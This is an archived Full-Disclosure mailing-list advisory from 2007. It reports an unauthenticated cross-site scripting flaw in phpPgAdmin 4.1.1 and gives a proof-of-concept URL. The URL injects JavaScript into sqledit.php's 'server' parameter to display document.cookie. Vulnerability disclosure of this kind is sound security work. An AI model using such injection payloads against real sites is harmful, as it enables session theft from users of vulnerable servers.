full-disclosure-uk May 2007 archive
Main Archive Page > Month Archives  > full-disclosure-uk archives
full-disclosure-uk: [Full-disclosure] phpPgAdmin XSS Vulnerabili

[Full-disclosure] phpPgAdmin XSS Vulnerability

From: Michal Majchrowicz <m.majchrowicz_at_nospam>
Date: Tue May 22 2007 - 23:28:59 GMT
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com, vulndiscuss@vulnwatch.org, vulnwatch@vulnwatch.org


There is a JavaScript code Injection in phpPgAdmin which fails to correctly sanitize user supplied data. As a result very simple XSS is possible. This was tested on phpPgAdmin 4.1.1 as not logged user. PoC:
https://test.com/phpPgAdmin/sqledit.php?server=%3A5432%3Aallow');alert(document.cookie);alert('phpPgAdmin%204.1.1%20XSS%20Vulnerability');// Regards Michal Majchrowicz.
Hack.pl



Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/